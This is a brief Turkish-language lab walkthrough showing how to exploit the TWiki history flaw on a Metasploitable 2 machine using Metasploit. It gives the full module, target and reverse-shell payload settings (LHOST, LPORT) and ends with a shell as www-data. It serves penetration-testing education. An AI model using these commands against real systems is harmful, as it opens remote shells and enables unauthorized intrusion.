IP adresi 100.100.200.7 olan Metasploitable 2’deki zafiyetin istismar işlemi için Metaplosploit Framework içerisindeki twiki_history istismar modülü kullanılabilir.
search twiki
use exploit/unix/webapp/twiki_history
show options
MSF modülüne hedef sistemin IP adresi verilerek istismar işlemi gerçekleştirilebilir. Ancak bazı durumlarda LHOST/LPORT gibi değerlerin ayarlı olarak gelmediği görülebilir. Bu sebeple PAYLOAD verilerek modül seçenekleri incelenebilir.
set RHOST 100.100.200.7
set PAYLOAD cmd/unix/reverse
show options
LHOST ve LPORT değerleri ayarlandıktan sonra istismar işlemi gerçekleştirilir.
set LHOST 100.100.200.4
set LPORT 4456
run
id
Servisi çalıştıran hesap (www-data) yetkileri ile Meterpreter bağlantısı elde edilmiştir.